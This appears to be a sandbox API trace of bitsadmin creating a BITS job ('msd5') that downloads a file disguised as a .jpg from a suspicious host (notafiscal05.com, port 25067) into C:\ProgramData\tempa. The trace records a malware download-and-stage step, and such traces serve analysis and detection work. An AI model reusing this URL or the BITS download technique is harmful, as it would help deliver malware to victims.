[0064.174] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4343c4*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1efe00, lpReserved=0x0 | out: lpBuffer=0x4343c4*, lpNumberOfCharsWritten=0x1efe00*=0x2) returned 1
[0064.174] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0
[0064.187] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
[0064.187] GetNumberOfConsoleInputEvents (in: hConsoleInput=0x3, lpNumberOfEvents=0x1efe4c | out: lpNumberOfEvents=0x1efe4c) returned 1
[0064.187] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
[0064.187] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x42c3a8 | out: lpMode=0x42c3a8) returned 1
[0064.187] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x42c390 | out: lpConsoleScreenBufferInfo=0x42c390) returned 1
[0064.188] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x42c38c | out: lpMode=0x42c38c) returned 1
[0064.188] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
[0064.188] _wcsicmp (_String1="/transfer", _String2="/HELP") returned 12
[0064.188] _wcsicmp (_String1="/transfer", _String2="/?") returned 53
[0064.188] _wcsicmp (_String1="/transfer", _String2="/UTIL") returned -1
[0064.188] _wcsicmp (_String1="/transfer", _String2="/LIST") returned 8
[0064.188] _wcsicmp (_String1="/transfer", _String2="/MONITOR") returned 7
[0064.188] _wcsicmp (_String1="/transfer", _String2="/RESET") returned 2
[0064.188] _wcsicmp (_String1="/transfer", _String2="/TRANSFER") returned 0
[0064.188] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x1) returned 1
[0064.189] _wcsicmp (_String1="/priority", _String2="/UPLOAD") returned -5
[0064.189] _wcsicmp (_String1="/priority", _String2="/DOWNLOAD") returned 12
[0064.189] _wcsicmp (_String1="/priority", _String2="/PRIORITY") returned 0
[0064.189] _wcsicmp (_String1="foreground", _String2="FOREGROUND") returned 0
[0064.189] CoCreateInstance (in: rclsid=0x4165d4*(Data1=0x4991d34b, Data2=0x80a1, Data3=0x4291, Data4=([0]=0x83, [1]=0xb6, [2]=0x33, [3]=0x28, [4]=0x36, [5]=0x6b, [6]=0x90, [7]=0x97)), pUnkOuter=0x0, dwClsContext=0x4, riid=0x4165b4*(Data1=0x5ce34c0d, Data2=0xdc9, Data3=0x4c1f, Data4=([0]=0x89, [1]=0x7c, [2]=0xda, [3]=0xa1, [4]=0xb7, [5]=0x8c, [6]=0xee, [7]=0x7c)), ppv=0x42c3b4 | out: ppv=0x42c3b4*=0x5ea53c) returned 0x0
[0064.237] IBackgroundCopyManager:CreateJob (in: This=0x5ea53c, DisplayName="msd5", Type=0x0, pJobId=0x1efe14, ppJob=0x1efe10 | out: pJobId=0x1efe14*(Data1=0x3be5c027, Data2=0x78ee, Data3=0x4e18, Data4=([0]=0x94, [1]=0x3, [2]=0xf6, [3]=0x3b, [4]=0xd2, [5]=0xa5, [6]=0xd, [7]=0xf6)), ppJob=0x1efe10*=0x5ea614) returned 0x0
[0064.243] CoTaskMemAlloc (cb=0x50) returned 0x600c68
[0064.244] IUnknown:AddRef (This=0x5ea614) returned 0x2
[0064.244] IUnknown:AddRef (This=0x5ea614) returned 0x3
[0064.244] PeekMessageW (in: lpMsg=0x1efd8c, hWnd=0x0, wMsgFilterMin=0x400, wMsgFilterMax=0x400, wRemoveMsg=0x0 | out: lpMsg=0x1efd8c) returned 0
[0064.244] IUnknown:Release (This=0x5ea614) returned 0x2
[0064.244] IBackgroundCopyJob:SetPriority (This=0x5ea614, Val=0x0) returned 0x0
[0064.248] IBackgroundCopyJob:AddFile (This=0x5ea614, RemoteUrl="http://xbr6lge984320911.notafiscal05.com:25067/04/marxvxinhhmc.jpg.zip?105185218", LocalName="C:\\ProgramData\\tempa\\marxvxinhhmc.jpg") returned 0x0
[0064.256] IBackgroundCopyJob:SetNotifyFlags (This=0x5ea614, Val=0xb) returned 0x0
[0064.260] IBackgroundCopyJob:SetNotifyInterface (This=0x5ea614, Val=0x600c68) returned 0x0
[0064.260] IUnknown:QueryInterface (in: This=0x600c68, riid=0x76a63e0c*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1ef890 | out: ppvObject=0x1ef890*=0x0) returned 0x80004002
[0064.260] IUnknown:QueryInterface (in: This=0x600c68, riid=0x76a63e0c*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1ef850 | out: ppvObject=0x1ef850*=0x0) returned 0x80004002
[0064.260] IUnknown:QueryInterface (in: This=0x600c68, riid=0x76a597c4*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1ef838 | out: ppvObject=0x1ef838*=0x0) returned 0x80004002
[0064.260] IUnknown:QueryInterface (in: This=0x600c68, riid=0x76a69b0c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1ef7ec | out: ppvObject=0x1ef7ec*=0x600c68) returned 0x0
[0064.260] IUnknown:AddRef (This=0x600c68) returned 0x3
[0064.261] IUnknown:QueryInterface (in: This=0x600c68, riid=0x76a4c15c*(Data1=0x18, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1ef74c | out: ppvObject=0x1ef74c*=0x0) returned 0x80004002
[0064.261] IUnknown:QueryInterface (in: This=0x600c68, riid=0x76a4c0a8*(Data1=0x19, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x600d7c | out: ppvObject=0x600d7c*=0x0) returned 0x80004002
[0064.261] IUnknown:QueryInterface (in: This=0x600c68, riid=0x76a4c16c*(Data1=0x4c1e39e1, Data2=0xe3e3, Data3=0x4296, Data4=([0]=0xaa, [1]=0x86, [2]=0xec, [3]=0x93, [4]=0x8d, [5]=0x89, [6]=0x6e, [7]=0x92)), ppvObject=0x1ef754 | out: ppvObject=0x1ef754*=0x0) returned 0x80004002
[0064.261] IUnknown:Release (This=0x600c68) returned 0x2
[0064.263] IUnknown:QueryInterface (in: This=0x600c68, riid=0x5f1b90*(Data1=0x659cdeac, Data2=0x489e, Data3=0x11d9, Data4=([0]=0xa9, [1]=0xcd, [2]=0x0, [3]=0xd, [4]=0x56, [5]=0x96, [6]=0x52, [7]=0x51)), ppvObject=0x1eec5c | out: ppvObject=0x1eec5c*=0x0) returned 0x80004002
[0064.263] IUnknown:QueryInterface (in: This=0x600c68, riid=0x5f1b90*(Data1=0x97ea99c7, Data2=0x186, Data3=0x4ad4, Data4=([0]=0x8d, [1]=0xf9, [2]=0xc5, [3]=0xb4, [4]=0xe0, [5]=0xed, [6]=0x6b, [7]=0x22)), ppvObject=0x1eec5c | out: ppvObject=0x1eec5c*=0x600c68) returned 0x0
[0064.264] IUnknown:QueryInterface (in: This=0x600c68, riid=0x5f1b90*(Data1=0x97ea99c7, Data2=0x186, Data3=0x4ad4, Data4=([0]=0x8d, [1]=0xf9, [2]=0xc5, [3]=0xb4, [4]=0xe0, [5]=0xed, [6]=0x6b, [7]=0x22)), ppvObject=0x5f82f0 | out: ppvObject=0x5f82f0*=0x600c68) returned 0x0
[0064.266] IBackgroundCopyJob:Resume (This=0x5ea614) returned 0x0
[0064.269] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
[0064.269] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
[0064.269] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x1efd70 | out: lpMode=0x1efd70) returned 1
[0064.272] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1b1) returned 1
[0064.273] MsgWaitForMultipleObjectsEx (nCount=0x1, pHandles=0x1efdb0*=0x3, dwMilliseconds=0xffffffff, dwWakeMask=0x4ff, dwFlags=0x2) returned 0x1
[0064.273] PeekMessageW (in: lpMsg=0x1efd88, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x1efd88) returned 1
[0064.273] TranslateMessage (lpMsg=0x1efd88) returned 0
[0064.273] DispatchMessageW (lpMsg=0x1efd88) returned 0x1
[0064.273] IUnknown:QueryInterface (in: This=0x600c68, riid=0x76a4c17c*(Data1=0x1c733a30, Data2=0x2a1c, Data3=0x11ce, Data4=([0]=0xad, [1]=0xe5, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x44, [6]=0x77, [7]=0x3d)), ppvObject=0x1ef8e4 | out: ppvObject=0x1ef8e4*=0x0) returned 0x80004002
[0064.273] IBackgroundCopyCallback:JobModification (This=0x600c68, pJob=0x5ea6a4, dwReserved=0x0) returned 0x0
[0064.273] IBackgroundCopyJob:GetState (in: This=0x5ea614, pVal=0x600c74 | out: pVal=0x600c74) returned 0x0
[0064.273] IBackgroundCopyCallback:JobModification (This=0x600c68, pJob=0x5ea6a4, dwReserved=0x0) returned 0x0
[0064.273] IBackgroundCopyJob:GetState (in: This=0x5ea614, pVal=0x600c74 | out: pVal=0x600c74) returned 0x0
[0064.274] IBackgroundCopyJob:GetType (in: This=0x5ea614, pVal=0x1ee448 | out: pVal=0x1ee448) returned 0x0
[0064.275] IBackgroundCopyJob:GetProgress (in: This=0x5ea614, pVal=0x600c78 | out: pVal=0x600c78) returned 0x0
[0064.276] IBackgroundCopyJob:GetPriority (in: This=0x5ea614, pVal=0x1ee444 | out: pVal=0x1ee444) returned 0x0
[0064.277] CoTaskMemFree (pv=0x0)
[0064.277] IBackgroundCopyJob:GetDisplayName (in: This=0x5ea614, pVal=0x1ee45c | out: pVal=0x1ee45c*="msd5") returned 0x0
[0064.278] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1ee404 | out: lpConsoleScreenBufferInfo=0x1ee404) returned 1
[0064.278] FillConsoleOutputCharacterW (in: hConsoleOutput=0x7, cCharacter=0x20, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfCharsWritten=0x1ee41c | out: lpNumberOfCharsWritten=0x1ee41c) returned 1
[0064.278] FillConsoleOutputAttribute (in: hConsoleOutput=0x7, wAttribute=0x7, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfAttrsWritten=0x1ee41c | out: lpNumberOfAttrsWritten=0x1ee41c) returned 1
[0064.279] SetConsoleCursorPosition (hConsoleOutput=0x7, dwCursorPosition=0x0) returned 1
[0064.279] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0064.279] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1ee3f0 | out: lpConsoleScreenBufferInfo=0x1ee3f0) returned 1
[0064.279] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4343c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x1ee408, lpReserved=0x0 | out: lpBuffer=0x4343c4*, lpNumberOfCharsWritten=0x1ee408*=0xa) returned 1
[0064.279] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0064.279] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1ee3ec | out: lpConsoleScreenBufferInfo=0x1ee3ec) returned 1
[0064.280] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4343c4*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x1ee404, lpReserved=0x0 | out: lpBuffer=0x4343c4*, lpNumberOfCharsWritten=0x1ee404*=0x5) returned 1
[0064.280] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0064.280] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1ee3f4 | out: lpConsoleScreenBufferInfo=0x1ee3f4) returned 1
[0064.280] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4343c4*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0x1ee40c, lpReserved=0x0 | out: lpBuffer=0x4343c4*, lpNumberOfCharsWritten=0x1ee40c*=0x7) returned 1
[0064.280] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0064.281] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1ee3e8 | out: lpConsoleScreenBufferInfo=0x1ee3e8) returned 1
[0064.281] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4343c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x1ee400, lpReserved=0x0 | out: lpBuffer=0x4343c4*, lpNumberOfCharsWritten=0x1ee400*=0x8) returned 1
[0064.281] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0064.281] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1ee3f0 | out: lpConsoleScreenBufferInfo=0x1ee3f0) returned 1
[0064.281] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4343c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x1ee408, lpReserved=0x0 | out: lpBuffer=0x4343c4*, lpNumberOfCharsWritten=0x1ee408*=0x8) returned 1
[0064.282] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0064.282] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1ee3e4 | out: lpConsoleScreenBufferInfo=0x1ee3e4) returned 1
[0064.282] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4343c4*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x1ee3fc, lpReserved=0x0 | out: lpBuffer=0x4343c4*, lpNumberOfCharsWritten=0x1ee3fc*=0xc) returned 1
[0064.282] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0064.283] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1ee3f4 | out: lpConsoleScreenBufferInfo=0x1ee3f4) returned 1
[0064.283] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4343c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x1ee40c, lpReserved=0x0 | out: lpBuffer=0x4343c4*, lpNumberOfCharsWritten=0x1ee40c*=0xa) returned 1
[0064.283] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0064.283] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1ee3dc | out: lpConsoleScreenBufferInfo=0x1ee3dc) returned 1
[0064.283] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4343c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x1ee3f4, lpReserved=0x0 | out: lpBuffer=0x4343c4*, lpNumberOfCharsWritten=0x1ee3f4*=0xa) returned 1
[0064.283] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0064.284] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1ee3e4 | out: lpConsoleScreenBufferInfo=0x1ee3e4) returned 1
[0064.284] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4343c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x1ee3fc, lpReserved=0x0 | out: lpBuffer=0x4343c4*, lpNumberOfCharsWritten=0x1ee3fc*=0x8) returned 1
[0064.284] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0064.284] _vsnwprintf (in: _Buffer=0x4403f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x1ee408 | out: _Buffer="0") returned 1
[0064.284] _vsnwprintf (in: _Buffer=0x4403f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x1ee414 | out: _Buffer="1") returned 1
[0064.284] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1ee3e4 | out: lpConsoleScreenBufferInfo=0x1ee3e4) returned 1
[0064.285] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4343c4*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x1ee3fc, lpReserved=0x0 | out: lpBuffer=0x4343c4*, lpNumberOfCharsWritten=0x1ee3fc*=0x5) returned 1
[0064.285] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0064.285] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1ee3ec | out: lpConsoleScreenBufferInfo=0x1ee3ec) returned 1
[0064.285] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4343c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x1ee404, lpReserved=0x0 | out: lpBuffer=0x4343c4*, lpNumberOfCharsWritten=0x1ee404*=0x8) returned 1
[0064.285] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0064.286] _vsnwprintf (in: _Buffer=0x4403f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x1ee410 | out: _Buffer="0") returned 1
[0064.286] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1ee404 | out: lpSystemTimeAsFileTime=0x1ee404*(dwLowDateTime=0xd6fc2c30, dwHighDateTime=0x1d469c7))
[0064.286] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1ee3fc | out: lpSystemTimeAsFileTime=0x1ee3fc*(dwLowDateTime=0xd6fc2c30, dwHighDateTime=0x1d469c7))
[0064.286] _finite (_X=0x0) returned 0
[0064.286] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1ee3bc | out: lpConsoleScreenBufferInfo=0x1ee3bc) returned 1
[0064.286] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4343c4*, nNumberOfCharsToWrite=0xd, lpNumberOfCharsWritten=0x1ee3d4, lpReserved=0x0 | out: lpBuffer=0x4343c4*, lpNumberOfCharsWritten=0x1ee3d4*=0xd) returned 1
[0064.286] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0064.286] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1ee3c8 | out: lpConsoleScreenBufferInfo=0x1ee3c8) returned 1
[0064.287] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4343c4*, nNumberOfCharsToWrite=0xf, lpNumberOfCharsWritten=0x1ee3e0, lpReserved=0x0 | out: lpBuffer=0x4343c4*, lpNumberOfCharsWritten=0x1ee3e0*=0xf) returned 1
[0064.287] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0064.287] _vsnwprintf (in: _Buffer=0x1ee1f4, _BufferCount=0xfe, _Format="%.2f B/S", _ArgList=0x1ee1b8 | out: _Buffer="0.00 B/S") returned 8
[0064.287] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1ee40c | out: lpConsoleScreenBufferInfo=0x1ee40c) returned 1
[0064.287] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4343c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x1ee424, lpReserved=0x0 | out: lpBuffer=0x4343c4*, lpNumberOfCharsWritten=0x1ee424*=0x8) returned 1
[0064.288] CoTaskMemFree (pv=0x5f8388)
[0064.288] IBackgroundCopyJob:GetType (in: This=0x5ea614, pVal=0x1ef450 | out: pVal=0x1ef450) returned 0x0
[0064.289] IBackgroundCopyJob:GetProgress (in: This=0x5ea614, pVal=0x600c78 | out: pVal=0x600c78) returned 0x0
[0064.289] IBackgroundCopyJob:GetPriority (in: This=0x5ea614, pVal=0x1ef44c | out: pVal=0x1ef44c) returned 0x0
[0064.290] CoTaskMemFree (pv=0x0)
[0064.290] IBackgroundCopyJob:GetDisplayName (in: This=0x5ea614, pVal=0x1ef464 | out: pVal=0x1ef464*="msd5") returned 0x0
[0064.291] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1ef40c | out: lpConsoleScreenBufferInfo=0x1ef40c) returned 1
[0064.291] FillConsoleOutputCharacterW (in: hConsoleOutput=0x7, cCharacter=0x20, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfCharsWritten=0x1ef424 | out: lpNumberOfCharsWritten=0x1ef424) returned 1
[0064.291] FillConsoleOutputAttribute (in: hConsoleOutput=0x7, wAttribute=0x7, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfAttrsWritten=0x1ef424 | out: lpNumberOfAttrsWritten=0x1ef424) returned 1
[0064.291] SetConsoleCursorPosition (hConsoleOutput=0x7, dwCursorPosition=0x0) returned 1
[0064.291] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0064.292] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1ef3f8 | out: lpConsoleScreenBufferInfo=0x1ef3f8) returned 1
[0064.292] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4343c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x1ef410, lpReserved=0x0 | out: lpBuffer=0x4343c4*, lpNumberOfCharsWritten=0x1ef410*=0xa) returned 1
[0064.292] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0064.292] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1ef3f4 | out: lpConsoleScreenBufferInfo=0x1ef3f4) returned 1
[0064.292] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4343c4*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x1ef40c, lpReserved=0x0 | out: lpBuffer=0x4343c4*, lpNumberOfCharsWritten=0x1ef40c*=0x5) returned 1
[0064.293] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0064.293] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1ef3fc | out: lpConsoleScreenBufferInfo=0x1ef3fc) returned 1
[0064.293] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4343c4*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0x1ef414, lpReserved=0x0 | out: lpBuffer=0x4343c4*, lpNumberOfCharsWritten=0x1ef414*=0x7) returned 1
[0064.293] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0064.294] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1ef3f0 | out: lpConsoleScreenBufferInfo=0x1ef3f0) returned 1
[0064.294] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4343c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x1ef408, lpReserved=0x0 | out: lpBuffer=0x4343c4*, lpNumberOfCharsWritten=0x1ef408*=0x8) returned 1
[0064.294] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0064.294] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1ef3f8 | out: lpConsoleScreenBufferInfo=0x1ef3f8) returned 1
[0064.294] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4343c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x1ef410, lpReserved=0x0 | out: lpBuffer=0x4343c4*, lpNumberOfCharsWritten=0x1ef410*=0x8) returned 1
[0064.295] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0064.295] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1ef3ec | out: lpConsoleScreenBufferInfo=0x1ef3ec) returned 1
[0064.295] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4343c4*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x1ef404, lpReserved=0x0 | out: lpBuffer=0x4343c4*, lpNumberOfCharsWritten=0x1ef404*=0xc) returned 1
[0064.295] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0064.295] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1ef3fc | out: lpConsoleScreenBufferInfo=0x1ef3fc) returned 1
[0064.296] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4343c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x1ef414, lpReserved=0x0 | out: lpBuffer=0x4343c4*, lpNumberOfCharsWritten=0x1ef414*=0xa) returned 1
[0064.296] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0064.296] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1ef3e4 | out: lpConsoleScreenBufferInfo=0x1ef3e4) returned 1
[0064.296] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4343c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x1ef3fc, lpReserved=0x0 | out: lpBuffer=0x4343c4*, lpNumberOfCharsWritten=0x1ef3fc*=0xa) returned 1
[0064.296] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0064.297] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1ef3ec | out: lpConsoleScreenBufferInfo=0x1ef3ec) returned 1
[0064.297] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4343c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x1ef404, lpReserved=0x0 | out: lpBuffer=0x4343c4*, lpNumberOfCharsWritten=0x1ef404*=0x8) returned 1
[0064.297] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0064.297] _vsnwprintf (in: _Buffer=0x4403f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x1ef410 | out: _Buffer="0") returned 1
[0064.297] _vsnwprintf (in: _Buffer=0x4403f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x1ef41c | out: _Buffer="1") returned 1
[0064.297] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1ef3ec | out: lpConsoleScreenBufferInfo=0x1ef3ec) returned 1
[0064.297] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4343c4*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x1ef404, lpReserved=0x0 | out: lpBuffer=0x4343c4*, lpNumberOfCharsWritten=0x1ef404*=0x5) returned 1
[0064.298] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0064.298] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1ef3f4 | out: lpConsoleScreenBufferInfo=0x1ef3f4) returned 1
[0064.298] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4343c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x1ef40c, lpReserved=0x0 | out: lpBuffer=0x4343c4*, lpNumberOfCharsWritten=0x1ef40c*=0x8) returned 1
[0064.298] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0064.299] _vsnwprintf (in: _Buffer=0x4403f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x1ef418 | out: _Buffer="0") returned 1
[0064.299] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1ef404 | out: lpSystemTimeAsFileTime=0x1ef404*(dwLowDateTime=0xd6fe8d90, dwHighDateTime=0x1d469c7))
[0064.299] _finite (_X=0x0) returned 1
[0064.299] _finite (_X=0x0) returned 1
[0064.299] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1ef3c4 | out: lpConsoleScreenBufferInfo=0x1ef3c4) returned 1
[0064.299] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4343c4*, nNumberOfCharsToWrite=0xd, lpNumberOfCharsWritten=0x1ef3dc, lpReserved=0x0 | out: lpBuffer=0x4343c4*, lpNumberOfCharsWritten=0x1ef3dc*=0xd) returned 1
[0064.299] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0064.299] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1ef3d0 | out: lpConsoleScreenBufferInfo=0x1ef3d0) returned 1
